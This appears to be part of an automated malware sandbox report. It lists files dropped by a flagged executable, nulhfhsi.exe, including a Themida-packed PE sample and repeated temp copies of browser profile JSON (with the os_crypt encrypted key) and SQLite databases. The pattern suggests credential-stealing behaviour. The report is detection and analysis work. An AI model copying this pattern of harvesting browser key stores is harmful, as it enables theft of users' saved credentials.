                                                                                                                                                                                            Entropy (8bit):7.945985609581206
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:QPvYDnmWwqsSgx0Yn+bQVacRCBdYPtON7x2ojsU2xLQ2dG:QPAmfSgx0Y+bQQB7x2ojszxLI
                                                                                                                                                                                            MD5:029CE2E532FE5C70D3342F978F5463D0
                                                                                                                                                                                            SHA1:E4E3041B291F1E581DEEBC1C219E1DF3FCCC0A6B
                                                                                                                                                                                            SHA-256:507A7B00E9FBE68E5DD732BEA1BCE17F0451AB6C1250970A7CF0DDF5FBC2B83E
                                                                                                                                                                                            SHA-512:380EE1044A9FE7170965166DDDF5D8731301A3A681462FD4946F505E556B2A278CFEC09D9113B8DE4B75499BA27CBB04E8BC40374DD8ED0E1959BE3B20B972B1
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 90%
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g$`.....................2......X.b.. ........@.. ..............................b=F.....................................:@..P....`................F..6.......................................................................................... ..... ...z.................. ..` .0...........~..............@..@ ..... ......................@..B.idata... ...@......................@....rsrc....0...`...0..................@..@.themida..`.........................`....boot....@E...b..@E.................`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp36BF.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp36DF.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp36E0.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp3710.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp43E4.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp43E5.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp4425.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp6692.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp6D78.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp6D89.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp6DB9.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                            Entropy (8bit):0.698304057893793
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                                                                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp9573.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpBF35.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpBF65.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpBF66.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
